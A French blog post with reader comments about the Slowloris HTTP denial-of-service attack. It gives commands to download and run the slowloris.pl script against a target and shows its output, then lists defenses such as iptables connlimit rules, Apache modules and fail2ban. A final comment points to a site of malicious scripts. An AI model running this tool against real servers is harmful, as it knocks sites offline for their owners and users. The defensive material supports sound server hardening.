30nov.2009
Attaque Slowloris (DoS) l'essayer et l'empécher
J'arrive un peu après la guerre mais bon...
Slowloris est une attaque à la mode elle consiste à ouvrir plusieurs connexions en envoyant des requetes http partielles et au compte-goutte pour conserver les connexions ouvertes le plus longtemps possible ainsi le serveur cible est rapidement saturé, c'est une attaque DoS (deny of service).
A en croire le site http://ha.ckers.org/slowloris/ une grande majorité des serveurs web sont touchés.
Tester la chose :
Avec un script perl
wget http://ha.ckers.org/slowloris/slowloris.pl chmod +x slowloris.pl ./slowloris.pl -dns ip-cible ou url
Vous aurez peut être comme moi à installer quelques modules perl pour que le script fonctionne.
- strict
- IO::Socket::INET
- IO::Socket::SSL
- Getopt::Long
- Config
Une fois lancé vous devriez avoir quelques chose comme ceci :
[...] Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client Defaulting to port 80. Defaulting to a 5 second tcp connection timeout. Defaulting to a 100 second re-try timeout. Defaulting to 1000 connections. Multithreading enabled. Connecting to ouitech.net:80 every 100 seconds with 1000 sockets: Building sockets. Building sockets. Building sockets. [...]
Testez le sur un de VOS serveurs... :p
Vous devriez voir sur la cible avec la commande netstat qui va bien le nombre de connexions simultanées utilisant petit à petit toutes les ressources du serveur qui à la longue ne répondra plus au requête légitime et n'acceptera plus de nouvelles connexions.
netstat -tan | grep ip:80 | wc -l 289
Parer Slowloris :
Il existe plusieurs solutions :
- Iptables
- Affiner les options de votre serveur web
- Utilisé un reverse proxy genre HAProxy
- Modsecurity
- Mod_cband
- Mod_qos
- Mod_bandwidth
- Mod_evasive
- Mod_slotlimit
- Mod_limitipconn
- Mod_throttle
Et sûrement d'autres.
Bon courage à tous 
Commentaires
lundi, novembre 30 2009 | 13:30
c'est tres malin comme post . Montrer comment utiliser des scripts pour faire des attaques.
Nul !
lundi, novembre 30 2009 | 13:58
Il faut savoir un minimum attaquer pour pouvoir défendre
c'est la sécurité on appel ça 
lundi, novembre 30 2009 | 14:08
vermine,
Plutot que montrer ton ignorance dans le domaine tu aurais pu juste demander comment s'en protéger, allez je suis sympa :
iptables -I INPUT -p tcp --dport 80 -m connlimit --connlimit-above 10 --connlimit-mask 40 -j DROP
Je suis sur que t'es assez smart pour comprendre la commande.
lundi, novembre 30 2009 | 14:14
@ vermine, tu préfère surement la méthode de l'autruche, que personne n'en parle, comme ça on se protège des scripts kiddies...
lundi, novembre 30 2009 | 14:39
Existe t il un moyen simple et efficace pour parer a cette attaque ?
J'ai tenté de sécurisé le http.conf sans succès ...
Merci d'avance
lundi, novembre 30 2009 | 14:42
Merci macsim pour ta commande iptables mais quand on a pas d'iptables y a une solution simple et efficace ?
Merci d'avance
lundi, novembre 30 2009 | 16:17
Dans un .htaccess ou dans le httpd.conf d'apache :
MaxConnPerIP 20
lundi, novembre 30 2009 | 18:45
Solution simple et efficace pour debian : aptitude install libapache2-mod-antiloris
lundi, novembre 30 2009 | 22:12
Merci StalkR.
Ce paquet fonctionne aussi sur Ubuntu (Serveur) et est dispo ici : http://packages.debian.org/squeeze/...
vendredi, décembre 25 2009 | 23:54
Sinon il y'a fail2ban qui une fois configuré est très efficace contre les attaque DDos
mardi, janvier 5 2010 | 19:38
@Keul
Oui ça fonctionne sauf si l'attaquant génère des adresses IP aléatoires à chaque requête. A ma connaissance, il n'y a pas de solution parfaite pour contrer cette attaque et en tout cas pas en une seule ligne
mardi, mars 23 2010 | 13:41
{{iptables -m connlimit -h
iptables v1.3.8: Couldn't load match `connlimit':/lib/iptables/libipt_connlimit.so: cannot open shared object file: No such file or directory
Try `iptables -h' or 'iptables --help' for more information.}}
Par défaut se module n'est pas dans iptables, il faut le compiler.
dimanche, juin 13 2010 | 01:35
Pourquoi les français sont-ils autant partisan de la censure? Je suis d'avis que ce genre de postes sont très intéressant du fait que je trouve bon de pouvoir tester sois-même ses contremesures.
Allez voir ce site pour encore plus de script malveillants:
http://sgpup.com